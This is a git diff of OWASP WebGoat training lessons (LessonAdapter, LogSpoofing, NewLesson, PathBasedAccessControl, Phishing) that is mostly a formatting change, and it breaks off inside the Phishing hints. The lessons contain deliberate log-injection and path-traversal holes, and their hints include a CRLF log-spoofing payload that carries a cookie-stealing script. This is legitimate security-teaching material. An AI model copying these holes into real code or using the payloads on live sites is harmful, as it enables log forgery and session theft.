+						"Lesson are simple to create and very little coding is required. &nbsp;&nbsp;"
+								+ "In fact, most lessons can be created by following the easy to use instructions in the "
+								+ "<A HREF=http://www.owasp.org/index.php/WebGoat_User_and_Install_Guide_Table_of_Contents>WebGoat User Guide.</A>&nbsp;&nbsp;"
+								+ "If you would prefer, send your lesson ideas to "
+								+ getWebgoatContext().getFeedbackAddress()));
 
-	String fileName = s.getContext().getRealPath(
-		"doc/New Lesson Instructions.txt");
-	if (fileName != null)
-	{
-	    try
-	    {
-		PRE pre = new PRE();
-		BufferedReader in = new BufferedReader(new FileReader(fileName));
-		String line = null;
-		while ((line = in.readLine()) != null)
+		String fileName = s.getContext().getRealPath("doc/New Lesson Instructions.txt");
+		if (fileName != null)
 		{
-		    pre.addElement(line + "\n");
+			try
+			{
+				PRE pre = new PRE();
+				BufferedReader in = new BufferedReader(new FileReader(fileName));
+				String line = null;
+				while ((line = in.readLine()) != null)
+				{
+					pre.addElement(line + "\n");
+				}
+				ec.addElement(pre);
+			} catch (Exception e)
+			{
+				e.printStackTrace();
+			}
 		}
-		ec.addElement(pre);
-	    }
-	    catch (Exception e)
-	    {
-	    	e.printStackTrace();
-	    }
+		return (ec);
 	}
-	return (ec);
-    }
 
-
-    /**
-     *  Gets the category attribute of the LessonAdapter object. The default category is "General" Only
-     *  override this method if you wish to create a new category or if you wish this lesson to reside
-     *  within a category other the "General"
-     *
-     * @return    The category value
-     */
-    protected Category getDefaultCategory()
-    {
-	return Category.GENERAL;
-    }
-
-
-    protected boolean getDefaultHidden()
-    {
-	return false;
-    }
-
-    private final static Integer DEFAULT_RANKING = new Integer(1000);
-
-
-    protected Integer getDefaultRanking()
-    {
-	return DEFAULT_RANKING;
-    }
-
-
-    /**
-     *  Gets the hintCount attribute of the LessonAdapter object
-     *
-     * @return    The hintCount value
-     */
-    public int getHintCount(WebSession s)
-    {
-	return getHints(s).size();
-    }
-
-
-    /**
-     *  Fill in a minor hint that will help people who basically get it, but are stuck on somthing
-     *  silly. Hints will be returned to the user in the order they appear below. The user must click
-     *  on the "next hint" button before the hint will be displayed.
-     *
-     * @return    The hint1 value
-     */
-    protected List<String> getHints(WebSession s)
-    {
-	List<String> hints = new ArrayList<String>();
-	hints.add("There are no hints defined.");
-
-	return hints;
-    }
-
-
-    public String getHint(WebSession s, int hintNumber)
-    {
-	return (String) getHints(s).get(hintNumber);
-    }
-
-
-    /**
-     *  Gets the credits attribute of the AbstractLesson object
-     *
-     * @return    The credits value
-     */
-    public Element getCredits()
-    {
-    	return new StringElement();
-    }
-
-
-    /**
-     *  Gets the instructions attribute of the LessonAdapter object. Instructions will rendered as html
-     *  and will appear below the control area and above the actual lesson area. Instructions should
-     *  provide the user with the general setup and goal of the lesson.
-     *
-     * @return    The instructions value
-     */
-    public String getInstructions(WebSession s)
-    {
-	StringBuffer buff = new StringBuffer();
-	try
+	/**
+	 * Gets the category attribute of the LessonAdapter object. The default category is "General"
+	 * Only override this method if you wish to create a new category or if you wish this lesson to
+	 * reside within a category other the "General"
+	 * 
+	 * @return The category value
+	 */
+	protected Category getDefaultCategory()
 	{
-	    String fileName = s.getWebResource(getLessonPlanFileName());
-	    if (fileName != null)
-	    {
-		BufferedReader in = new BufferedReader(new FileReader(fileName));
-		String line = null;
-		boolean startAppending = false;
-		while ((line = in.readLine()) != null)
-		{
-		    if (line.indexOf("<!-- Start Instructions -->") != -1)
-		    {
-			startAppending = true;
-			continue;
-		    }
-		    if (line.indexOf("<!-- Stop Instructions -->") != -1)
-		    {
-			startAppending = false;
-			continue;
-		    }
-		    if (startAppending)
-		    {
-			buff.append(line + "\n");
-		    }
-		}
-	    }
+		return Category.GENERAL;
 	}
-	catch (Exception e)
-	{}
 
-	return buff.toString();
+	protected boolean getDefaultHidden()
+	{
+		return false;
+	}
 
-    }
+	private final static Integer DEFAULT_RANKING = new Integer(1000);
 
+	protected Integer getDefaultRanking()
+	{
+		return DEFAULT_RANKING;
+	}
 
-    /**
-     *  Fill in a descriptive title for this lesson. The title of the lesson. This will appear above
-     *  the control area at the top of the page. This field will be rendered as html.
-     *
-     * @return    The title value
-     */
-    public String getTitle()
-    {
-	return "Untitled Lesson " + getScreenId();
-    }
+	/**
+	 * Gets the hintCount attribute of the LessonAdapter object
+	 * 
+	 * @return The hintCount value
+	 */
+	public int getHintCount(WebSession s)
+	{
+		return getHints(s).size();
+	}
 
+	/**
+	 * Fill in a minor hint that will help people who basically get it, but are stuck on somthing
+	 * silly. Hints will be returned to the user in the order they appear below. The user must click
+	 * on the "next hint" button before the hint will be displayed.
+	 * 
+	 * @return The hint1 value
+	 */
+	protected List<String> getHints(WebSession s)
+	{
+		List<String> hints = new ArrayList<String>();
+		hints.add("There are no hints defined.");
 
-    public String getCurrentAction(WebSession s)
-    {
-	return s.getLessonSession(this).getCurrentLessonScreen();
-    }
+		return hints;
+	}
 
+	public String getHint(WebSession s, int hintNumber)
+	{
+		return (String) getHints(s).get(hintNumber);
+	}
 
-    public void setCurrentAction(WebSession s, String lessonScreen)
-    {
-	s.getLessonSession(this).setCurrentLessonScreen(lessonScreen);
-    }
+	/**
+	 * Gets the credits attribute of the AbstractLesson object
+	 * 
+	 * @return The credits value
+	 */
+	public Element getCredits()
+	{
+		return new StringElement();
+	}
 
+	/**
+	 * Gets the instructions attribute of the LessonAdapter object. Instructions will rendered as
+	 * html and will appear below the control area and above the actual lesson area. Instructions
+	 * should provide the user with the general setup and goal of the lesson.
+	 * 
+	 * @return The instructions value
+	 */
+	public String getInstructions(WebSession s)
+	{
+		StringBuffer buff = new StringBuffer();
+		try
+		{
+			String fileName = s.getWebResource(getLessonPlanFileName());
+			if (fileName != null)
+			{
+				BufferedReader in = new BufferedReader(new FileReader(fileName));
+				String line = null;
+				boolean startAppending = false;
+				while ((line = in.readLine()) != null)
+				{
+					if (line.indexOf("<!-- Start Instructions -->") != -1)
+					{
+						startAppending = true;
+						continue;
+					}
+					if (line.indexOf("<!-- Stop Instructions -->") != -1)
+					{
+						startAppending = false;
+						continue;
+					}
+					if (startAppending)
+					{
+						buff.append(line + "\n");
+					}
+				}
+			}
+		} catch (Exception e)
+		{
+		}
 
-    public Object getSessionAttribute(WebSession s, String key)
-    {
-	return s.getRequest().getSession().getAttribute(key);
-    }
+		return buff.toString();
 
+	}
 
-    public void setSessionAttribute(WebSession s, String key, Object value)
-    {
-	s.getRequest().getSession().setAttribute(key, value);
-    }
+	/**
+	 * Fill in a descriptive title for this lesson. The title of the lesson. This will appear above
+	 * the control area at the top of the page. This field will be rendered as html.
+	 * 
+	 * @return The title value
+	 */
+	public String getTitle()
+	{
+		return "Untitled Lesson " + getScreenId();
+	}
 
+	public String getCurrentAction(WebSession s)
+	{
+		return s.getLessonSession(this).getCurrentLessonScreen();
+	}
 
-    /**
-     *  Description of the Method
-     *
-     * @param  s  Description of the Parameter
-     * @return    Description of the Return Value
-     */
-    protected Element makeSuccess(WebSession s)
-    {
-	getLessonTracker(s).setCompleted(true);
+	public void setCurrentAction(WebSession s, String lessonScreen)
+	{
+		s.getLessonSession(this).setCurrentLessonScreen(lessonScreen);
+	}
 
-	s
-		.setMessage("Congratulations. You have successfully completed this lesson.");
+	public Object getSessionAttribute(WebSession s, String key)
+	{
+		return s.getRequest().getSession().getAttribute(key);
+	}
 
-	return (null);
-    }
+	public void setSessionAttribute(WebSession s, String key, Object value)
+	{
+		s.getRequest().getSession().setAttribute(key, value);
+	}
 
+	/**
+	 * Description of the Method
+	 * 
+	 * @param s
+	 *            Description of the Parameter
+	 * @return Description of the Return Value
+	 */
+	protected Element makeSuccess(WebSession s)
+	{
+		getLessonTracker(s).setCompleted(true);
 
-    /**
-     *  Gets the credits attribute of the AbstractLesson object
-     *
-     * @return    The credits value
-     */
-    protected Element getCustomCredits(String text, Element e)
-    {
+		s.setMessage("Congratulations. You have successfully completed this lesson.");
+
+		return (null);
+	}
+
+	/**
+	 * Gets the credits attribute of the AbstractLesson object
+	 * 
+	 * @return The credits value
+	 */
+	protected Element getCustomCredits(String text, Element e)
+	{
 		Table t = new Table().setCellSpacing(0).setCellPadding(0).setBorder(0).setWidth("90%").setAlign("RIGHT");
 		TR tr = new TR();
 		tr.addElement(new TD(text).setVAlign("MIDDLE").setAlign("RIGHT").setWidth("100%"));
 		tr.addElement(new TD(e).setVAlign("MIDDLE").setAlign("RIGHT"));
 		t.addElement(tr);
 		return t;
-    }
-    
+	}
+
 }
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/LogSpoofing.java b/main/project/JavaSource/org/owasp/webgoat/lessons/LogSpoofing.java
index 13081b3af..2181706f8 100644
--- a/main/project/JavaSource/org/owasp/webgoat/lessons/LogSpoofing.java
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/LogSpoofing.java
@@ -1,10 +1,10 @@
+
 package org.owasp.webgoat.lessons;
 
 import java.io.UnsupportedEncodingException;
 import java.net.URLDecoder;
 import java.util.ArrayList;
 import java.util.List;
-
 import org.apache.ecs.Element;
 import org.apache.ecs.ElementContainer;
 import org.apache.ecs.HtmlColor;
@@ -18,157 +18,145 @@ import org.apache.ecs.html.Table;
 import org.owasp.webgoat.session.ECSFactory;
 import org.owasp.webgoat.session.WebSession;
 
-/*******************************************************************************
+
+/***************************************************************************************************
  * 
  * 
- * This file is part of WebGoat, an Open Web Application Security Project
- * utility. For details, please see http://www.owasp.org/
+ * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
+ * please see http://www.owasp.org/
  * 
  * Copyright (c) 2002 - 2007 Bruce Mayhew
  * 
- * This program is free software; you can redistribute it and/or modify it under
- * the terms of the GNU General Public License as published by the Free Software
- * Foundation; either version 2 of the License, or (at your option) any later
- * version.
+ * This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
  * 
- * This program is distributed in the hope that it will be useful, but WITHOUT
- * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
- * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
- * details.
+ * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
+ * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+ * General Public License for more details.
  * 
- * You should have received a copy of the GNU General Public License along with
- * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
- * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
  * 
  * Getting Source ==============
  * 
- * Source for this application is maintained at code.google.com, a repository
- * for free software projects.
+ * Source for this application is maintained at code.google.com, a repository for free software
+ * projects.
  * 
  * For details, please see http://code.google.com/p/webgoat/
  * 
- * @author     Sherif Koussa <a href="http://www.macadamian.com">Macadamian Technologies</a>
- * @created    October 28, 2006
+ * @author Sherif Koussa <a href="http://www.macadamian.com">Macadamian Technologies</a>
+ * @created October 28, 2006
  */
 
 public class LogSpoofing extends LessonAdapter
 {
 
-    private static final String USERNAME = "username";
+	private static final String USERNAME = "username";
 
-    private static final String PASSWORD = "password";
+	private static final String PASSWORD = "password";
 
-    private final static IMG MAC_LOGO = new IMG("images/logos/macadamian.gif").setAlt(
-    "Macadamian Technologies").setBorder(0).setHspace(0).setVspace(0);
+	private final static IMG MAC_LOGO = new IMG("images/logos/macadamian.gif").setAlt("Macadamian Technologies")
+			.setBorder(0).setHspace(0).setVspace(0);
 
-    protected Element createContent(WebSession s)
-    {
-
-	ElementContainer ec = null;
-	String inputUsername = null;
-	try
+	protected Element createContent(WebSession s)
 	{
 
-	    Table t = new Table(0).setCellSpacing(0).setCellPadding(0)
-		    .setBorder(0);
-	    TR row1 = new TR();
-	    TR row2 = new TR();
-	    TR row3 = new TR();
+		ElementContainer ec = null;
+		String inputUsername = null;
+		try
+		{
 
-	    row1.addElement(new TD(new StringElement("Username: ")));
-	    Input username = new Input(Input.TEXT, USERNAME, "");
-	    row1.addElement(new TD(username));
+			Table t = new Table(0).setCellSpacing(0).setCellPadding(0).setBorder(0);
+			TR row1 = new TR();
+			TR row2 = new TR();
+			TR row3 = new TR();
 
-	    row2.addElement(new TD(new StringElement("Password: ")));
-	    Input password = new Input(Input.PASSWORD, PASSWORD, "");
-	    row2.addElement(new TD(password));
+			row1.addElement(new TD(new StringElement("Username: ")));
+			Input username = new Input(Input.TEXT, USERNAME, "");
+			row1.addElement(new TD(username));
 
-	    Element b = ECSFactory.makeButton("Login");
-	    row3.addElement(new TD(new StringElement("&nbsp; ")));
-	    row3.addElement(new TD(b)).setAlign("right");
+			row2.addElement(new TD(new StringElement("Password: ")));
+			Input password = new Input(Input.PASSWORD, PASSWORD, "");
+			row2.addElement(new TD(password));
 
-	    t.addElement(row1);
-	    t.addElement(row2);
-	    t.addElement(row3);
+			Element b = ECSFactory.makeButton("Login");
+			row3.addElement(new TD(new StringElement("&nbsp; ")));
+			row3.addElement(new TD(b)).setAlign("right");
 
-	    ec = new ElementContainer();
-	    ec.addElement(t);
+			t.addElement(row1);
+			t.addElement(row2);
+			t.addElement(row3);
 
-	    inputUsername = new String(s.getParser().getRawParameter(USERNAME,
-		    ""));
-	    if (inputUsername.length() != 0)
-	    {
-		inputUsername = URLDecoder.decode(inputUsername, "UTF-8");
-	    }
+			ec = new ElementContainer();
+			ec.addElement(t);
 
-	    ec.addElement(new PRE(" "));
+			inputUsername = new String(s.getParser().getRawParameter(USERNAME, ""));
+			if (inputUsername.length() != 0)
+			{
+				inputUsername = URLDecoder.decode(inputUsername, "UTF-8");
+			}
 
-	    Table t2 = new Table(0).setCellSpacing(0).setCellPadding(0)
-		    .setBorder(0);
-	    TR row4 = new TR();
-	    row4.addElement(
-		    new TD(new PRE("Login failed for username: "
-			    + inputUsername))).setBgColor(HtmlColor.GRAY);
+			ec.addElement(new PRE(" "));
 
-	    t2.addElement(row4);
+			Table t2 = new Table(0).setCellSpacing(0).setCellPadding(0).setBorder(0);
+			TR row4 = new TR();
+			row4.addElement(new TD(new PRE("Login failed for username: " + inputUsername))).setBgColor(HtmlColor.GRAY);
 
-	    ec.addElement(t2);
+			t2.addElement(row4);
 
-	    if (inputUsername.length() != 0
-		    && inputUsername.toUpperCase().indexOf(
-			    System.getProperty("line.separator")
-				    + "LOGIN SUCCEEDED FOR USERNAME:") >= 0)
-	    {
-		makeSuccess(s);
-	    }
+			ec.addElement(t2);
+
+			if (inputUsername.length() != 0
+					&& inputUsername.toUpperCase().indexOf(
+															System.getProperty("line.separator")
+																	+ "LOGIN SUCCEEDED FOR USERNAME:") >= 0)
+			{
+				makeSuccess(s);
+			}
+		} catch (UnsupportedEncodingException e)
+		{
+			s.setMessage("Error generating " + this.getClass().getName());
+			e.printStackTrace();
+		}
+		return ec;
 	}
-	catch (UnsupportedEncodingException e)
+
+	private final static Integer DEFAULT_RANKING = new Integer(72);
+
+	protected Integer getDefaultRanking()
 	{
-	    s.setMessage("Error generating " + this.getClass().getName());
-	    e.printStackTrace();
+		return DEFAULT_RANKING;
 	}
-	return ec;
-    }
 
-    private final static Integer DEFAULT_RANKING = new Integer(72);
+	@Override
+	protected List<String> getHints(WebSession s)
+	{
+		List<String> hints = new ArrayList<String>();
+		hints.add("Try to fool the humane eye by using new lines.");
+		hints.add("Use CR (%0d) and LF (%0a) for a new line.");
+		hints.add("Try: Smith%0d%0aLogin Succeeded for username: admin");
+		hints
+				.add("Try: Smith%0d%0aLogin Succeeded for username: admin&lt;script&gt;alert(document.cookie)&lt;/script&gt;");
 
+		return hints;
+	}
 
-    protected Integer getDefaultRanking()
-    {
-	return DEFAULT_RANKING;
-    }
+	@Override
+	public String getTitle()
+	{
+		return "Log Spoofing";
+	}
 
+	@Override
+	protected Category getDefaultCategory()
+	{
+		return Category.INJECTION;
+	}
 
-    @Override
-    protected List<String> getHints(WebSession s)
-    {
-	List<String> hints = new ArrayList<String>();
-	hints.add("Try to fool the humane eye by using new lines.");
-	hints.add("Use CR (%0d) and LF (%0a) for a new line.");
-	hints.add("Try: Smith%0d%0aLogin Succeeded for username: admin");
-	hints
-		.add("Try: Smith%0d%0aLogin Succeeded for username: admin&lt;script&gt;alert(document.cookie)&lt;/script&gt;");
-
-	return hints;
-    }
-
-
-    @Override
-    public String getTitle()
-    {
-	return "Log Spoofing";
-    }
-
-
-    @Override
-    protected Category getDefaultCategory()
-    {
-	return Category.INJECTION;
-    }
-
-
-    public Element getCredits()
-    {
-	return super.getCustomCredits("Created by Sherif Koussa ", MAC_LOGO);
-    }
+	public Element getCredits()
+	{
+		return super.getCustomCredits("Created by Sherif Koussa ", MAC_LOGO);
+	}
 }
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/NewLesson.java b/main/project/JavaSource/org/owasp/webgoat/lessons/NewLesson.java
index 978148880..09d1c1d53 100644
--- a/main/project/JavaSource/org/owasp/webgoat/lessons/NewLesson.java
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/NewLesson.java
@@ -1,90 +1,88 @@
+
 package org.owasp.webgoat.lessons;
 
 import org.apache.ecs.Element;
 import org.apache.ecs.StringElement;
 import org.owasp.webgoat.session.WebSession;
 
-/*******************************************************************************
+
+/***************************************************************************************************
  * 
  * 
- * This file is part of WebGoat, an Open Web Application Security Project
- * utility. For details, please see http://www.owasp.org/
+ * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
+ * please see http://www.owasp.org/
  * 
  * Copyright (c) 2002 - 2007 Bruce Mayhew
  * 
- * This program is free software; you can redistribute it and/or modify it under
- * the terms of the GNU General Public License as published by the Free Software
- * Foundation; either version 2 of the License, or (at your option) any later
- * version.
+ * This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
  * 
- * This program is distributed in the hope that it will be useful, but WITHOUT
- * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
- * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
- * details.
+ * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
+ * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+ * General Public License for more details.
  * 
- * You should have received a copy of the GNU General Public License along with
- * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
- * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
  * 
  * Getting Source ==============
  * 
- * Source for this application is maintained at code.google.com, a repository
- * for free software projects.
+ * Source for this application is maintained at code.google.com, a repository for free software
+ * projects.
  * 
  * For details, please see http://code.google.com/p/webgoat/
  * 
- * @author     Sherif Koussa <a href="http://www.macadamian.com">Macadamian Technologies.</a>
- * @created    October 28, 2003
+ * @author Sherif Koussa <a href="http://www.macadamian.com">Macadamian Technologies.</a>
+ * @created October 28, 2003
  */
 public class NewLesson extends LessonAdapter
 {
-    /**
-     *  Description of the Method
-     *
-     * @param  s  Description of the Parameter
-     * @return    Description of the Return Value
-     */
-    protected Element createContent(WebSession s)
-    {
-	return super.createContent(s);
-	//makeSuccess(s);
-	//ec.addElement(new StringElement("Welcome to the WebGoat hall of fame !!"));
-	//return (ec);
-    }
+	/**
+	 * Description of the Method
+	 * 
+	 * @param s
+	 *            Description of the Parameter
+	 * @return Description of the Return Value
+	 */
+	protected Element createContent(WebSession s)
+	{
+		return super.createContent(s);
+		// makeSuccess(s);
+		// ec.addElement(new StringElement("Welcome to the WebGoat hall of fame !!"));
+		// return (ec);
+	}
 
+	/**
+	 * Gets the category attribute of the NEW_LESSON object
+	 * 
+	 * @return The category value
+	 */
+	protected Category getDefaultCategory()
+	{
+		return Category.GENERAL;
+	}
 
-    /**
-     *  Gets the category attribute of the NEW_LESSON object
-     *
-     * @return    The category value
-     */
-    protected Category getDefaultCategory()
-    {
-    	return Category.GENERAL;
-    }
+	private final static Integer DEFAULT_RANKING = new Integer(85);
 
-    private final static Integer DEFAULT_RANKING = new Integer(85);
+	protected Integer getDefaultRanking()
+	{
+		return DEFAULT_RANKING;
+	}
 
+	/**
+	 * Gets the title attribute of the DirectoryScreen object
+	 * 
+	 * @return The title value
+	 */
+	public String getTitle()
+	{
+		return ("Create a WebGoat Lesson");
+	}
 
-    protected Integer getDefaultRanking()
-    {
-    	return DEFAULT_RANKING;
-    }
-
-
-    /**
-     *  Gets the title attribute of the DirectoryScreen object
-     *
-     * @return    The title value
-     */
-    public String getTitle()
-    {
-	return ("Create a WebGoat Lesson");
-    }
-    
-    public Element getCredits()
-    {
-	return super.getCustomCredits("Created by: Your name goes here!", new StringElement(""));
-    }
+	public Element getCredits()
+	{
+		return super.getCustomCredits("Created by: Your name goes here!", new StringElement(""));
+	}
 
 }
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/PathBasedAccessControl.java b/main/project/JavaSource/org/owasp/webgoat/lessons/PathBasedAccessControl.java
index 2ee358c52..f6e776b4d 100644
--- a/main/project/JavaSource/org/owasp/webgoat/lessons/PathBasedAccessControl.java
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/PathBasedAccessControl.java
@@ -1,3 +1,4 @@
+
 package org.owasp.webgoat.lessons;
 
 import java.io.BufferedReader;
@@ -5,7 +6,6 @@ import java.io.File;
 import java.io.FileReader;
 import java.util.ArrayList;
 import java.util.List;
-
 import org.apache.ecs.Element;
 import org.apache.ecs.ElementContainer;
 import org.apache.ecs.StringElement;
@@ -14,36 +14,34 @@ import org.apache.ecs.html.HR;
 import org.apache.ecs.html.TD;
 import org.apache.ecs.html.TR;
 import org.apache.ecs.html.Table;
-
 import org.owasp.webgoat.session.ECSFactory;
 import org.owasp.webgoat.session.WebSession;
 
-/*******************************************************************************
+
+/***************************************************************************************************
  * 
  * 
- * This file is part of WebGoat, an Open Web Application Security Project
- * utility. For details, please see http://www.owasp.org/
+ * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
+ * please see http://www.owasp.org/
  * 
  * Copyright (c) 2002 - 2007 Bruce Mayhew
  * 
- * This program is free software; you can redistribute it and/or modify it under
- * the terms of the GNU General Public License as published by the Free Software
- * Foundation; either version 2 of the License, or (at your option) any later
- * version.
+ * This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
  * 
- * This program is distributed in the hope that it will be useful, but WITHOUT
- * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
- * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
- * details.
+ * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
+ * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+ * General Public License for more details.
  * 
- * You should have received a copy of the GNU General Public License along with
- * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
- * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
  * 
  * Getting Source ==============
  * 
- * Source for this application is maintained at code.google.com, a repository
- * for free software projects.
+ * Source for this application is maintained at code.google.com, a repository for free software
+ * projects.
  * 
  * For details, please see http://code.google.com/p/webgoat/
  * 
@@ -111,13 +109,15 @@ public class PathBasedAccessControl extends LessonAdapter
 					s.setMessage("It appears that you are on the right track.  "
 							+ "Commands that may compromise the operating system have been disabled.  "
 							+ "You are only allowed to see one file in this directory. ");
-				} else if (upDirCount(file) > 3)
+				}
+				else if (upDirCount(file) > 3)
 				{
 					s.setMessage("Access denied");
 					s.setMessage("It appears that you are on the right track.  "
 							+ "Commands that may compromise the operating system have been disabled.  "
 							+ "You are only allowed to see files in the webgoat directory. ");
-				} else
+				}
+				else
 				{
 					illegalCommand = false;
 				}
@@ -153,16 +153,20 @@ public class PathBasedAccessControl extends LessonAdapter
 						s.setMessage("Congratulations! Access to file allowed");
 						s.setMessage(" ==> " + Encoding.urlDecode(f.getCanonicalPath()));
 						makeSuccess(s);
-					} else
+					}
+					else
 					{
 						s.setMessage("File is already in allowed directory - try again!");
 						s.setMessage(" ==> " + Encoding.urlDecode(f.getCanonicalPath()));
 					}
-				} else if (file != null && file.length() != 0)
+				}
+				else if (file != null && file.length() != 0)
 				{
-					s.setMessage("Access to file/directory \"" + Encoding.urlDecode(f.getCanonicalPath())
+					s
+							.setMessage("Access to file/directory \"" + Encoding.urlDecode(f.getCanonicalPath())
 									+ "\" denied");
-				} else
+				}
+				else
 				{
 					// do nothing, probably entry screen
 				}
@@ -176,30 +180,21 @@ public class PathBasedAccessControl extends LessonAdapter
 					ec.addElement(new HR().setWidth("100%"));
 					ec.addElement("Viewing file: " + f.getCanonicalPath());
 					ec.addElement(new HR().setWidth("100%"));
-					if (f.length() > 80000)
-					{
-						throw new Exception("File is too large");
-					}
+					if (f.length() > 80000) { throw new Exception("File is too large"); }
 					String fileData = getFileText(new BufferedReader(new FileReader(f)), false);
-					if (fileData.indexOf(0x00) != -1)
-					{
-						throw new Exception("File is binary");
-					}
-					ec
-							.addElement(new StringElement(fileData.replaceAll(System.getProperty("line.separator"),
-									"<br>").replaceAll("(?s)<!DOCTYPE.*/head>", "").replaceAll("<br><br>", "<br>")
-									.replaceAll("<br>\\s<br>", "<br>").replaceAll("<\\?", "&lt;").replaceAll(
-											"<(r|u|t)", "&lt;$1")));
-				}
-				catch (Exception e)
+					if (fileData.indexOf(0x00) != -1) { throw new Exception("File is binary"); }
+					ec.addElement(new StringElement(fileData.replaceAll(System.getProperty("line.separator"), "<br>")
+							.replaceAll("(?s)<!DOCTYPE.*/head>", "").replaceAll("<br><br>", "<br>")
+							.replaceAll("<br>\\s<br>", "<br>").replaceAll("<\\?", "&lt;").replaceAll("<(r|u|t)",
+																										"&lt;$1")));
+				} catch (Exception e)
 				{
 					ec.addElement(new BR());
 					ec.addElement("The following error occurred while accessing the file: <");
 					ec.addElement(e.getMessage());
 				}
 			}
-		}
-		catch (Exception e)
+		} catch (Exception e)
 		{
 			s.setMessage("Error generating " + this.getClass().getName());
 			e.printStackTrace();
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/Phishing.java b/main/project/JavaSource/org/owasp/webgoat/lessons/Phishing.java
index 64b9a3213..f529f9e77 100644
--- a/main/project/JavaSource/org/owasp/webgoat/lessons/Phishing.java
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/Phishing.java
@@ -1,8 +1,8 @@
+
 package org.owasp.webgoat.lessons;
 
 import java.util.ArrayList;
 import java.util.List;
-
 import org.apache.ecs.Element;
 import org.apache.ecs.ElementContainer;
 import org.apache.ecs.StringElement;
@@ -20,32 +20,31 @@ import org.owasp.webgoat.Catcher;
 import org.owasp.webgoat.session.ECSFactory;
 import org.owasp.webgoat.session.WebSession;
 
-/*******************************************************************************
+
+/***************************************************************************************************
  * 
  * 
- * This file is part of WebGoat, an Open Web Application Security Project
- * utility. For details, please see http://www.owasp.org/
+ * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
+ * please see http://www.owasp.org/
  * 
  * Copyright (c) 2002 - 2007 Bruce Mayhew
  * 
- * This program is free software; you can redistribute it and/or modify it under
- * the terms of the GNU General Public License as published by the Free Software
- * Foundation; either version 2 of the License, or (at your option) any later
- * version.
+ * This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
  * 
- * This program is distributed in the hope that it will be useful, but WITHOUT
- * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
- * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
- * details.
+ * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
+ * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+ * General Public License for more details.
  * 
- * You should have received a copy of the GNU General Public License along with
- * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
- * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
  * 
  * Getting Source ==============
  * 
- * Source for this application is maintained at code.google.com, a repository
- * for free software projects.
+ * Source for this application is maintained at code.google.com, a repository for free software
+ * projects.
  * 
  * For details, please see http://code.google.com/p/webgoat/
  * 
@@ -70,8 +69,8 @@ public class Phishing extends LessonAdapter
 	 */
 	private boolean postedCredentials(WebSession s)
 	{
-		String postedToCookieCatcher =
-				getLessonTracker(s).getLessonProperties().getProperty(Catcher.PROPERTY, Catcher.EMPTY_STRING);
+		String postedToCookieCatcher = getLessonTracker(s).getLessonProperties().getProperty(Catcher.PROPERTY,
+																								Catcher.EMPTY_STRING);
 
 		// <START_OMIT_SOURCE>
 		return (!postedToCookieCatcher.equals(Catcher.EMPTY_STRING));
@@ -100,8 +99,7 @@ public class Phishing extends LessonAdapter
 			{
 				makeSuccess(s);
 			}
-		}
-		catch (Exception e)
+		} catch (Exception e)
 		{
 			s.setMessage("Error generating " + this.getClass().getName());
 		}
@@ -169,66 +167,65 @@ public class Phishing extends LessonAdapter
 	{
 		List<String> hints = new ArrayList<String>();
 		hints.add("Try adding HTML to the search field to create a fake authentication form.<BR>"
-				  + "Try to make the form look official.");
+				+ "Try to make the form look official.");
 		hints
 				.add("Try: <BR> "
